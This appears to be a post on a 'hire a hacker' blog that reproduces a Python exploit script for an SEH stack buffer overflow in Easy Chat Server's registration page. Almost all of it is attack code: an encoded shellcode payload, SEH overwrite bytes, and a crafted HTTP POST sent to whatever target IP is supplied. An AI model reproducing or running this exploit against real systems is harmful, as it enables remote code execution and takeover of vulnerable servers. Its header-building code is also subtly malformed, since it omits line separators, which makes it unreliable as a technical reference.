Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86397281

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Easy Chat Server User Registeration Buffer Overflow (SEH)
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Buffer Overflow
# Severity: Critical
# Tested on: [Windows XP Sp3 Eng]


# ======================================================================================================================
#	Username parameter in Registeration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability.
# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. 
# ======================================================================================================================

# USAGE: python exploit.py ip

#!/usr/bin/python

import os
import sys
import socket

ip = sys.argv[1]

socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)

socket.connect((ip , 80))

#AlphanumericShellcode

shellcode = ("\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33"
"\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44"
"\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30"
"\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a"
"\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43"
"\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47"
"\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c"
"\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43"
"\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55"
"\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39"
"\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e"
"\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50"
"\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31"
"\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31"
"\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35"
"\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30"
"\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31"
"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a"
"\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36"
"\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f"
"\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58"
"\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34"
"\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b"
"\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d"
"\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39"
"\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50"
"\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56"
"\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45"
"\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59"
"\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f"
"\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45"
"\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50"
"\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32"
"\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57"
"\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57"
"\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46"
"\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31"
"\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
"\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56"
"\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45"
"\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a"
"\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c"
"\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37"
"\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f"
"\x4e\x35\x41\x41")     

magic = "B" * 217
magic += "\xeb\x06\x90\x90"
magic += "\xBC\x04\x01\x10"
magic += shellcode

magic += "C" * 200
 

buffer = "POST /registresult.htm HTTP/1.1\r\n\r\n"
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Referer: http://192.168.1.11/register.ghp"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"

buffer += "UserName=" + magic +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"

socket.send(buffer)

data = socket.recv(4096)
print data
socket.close()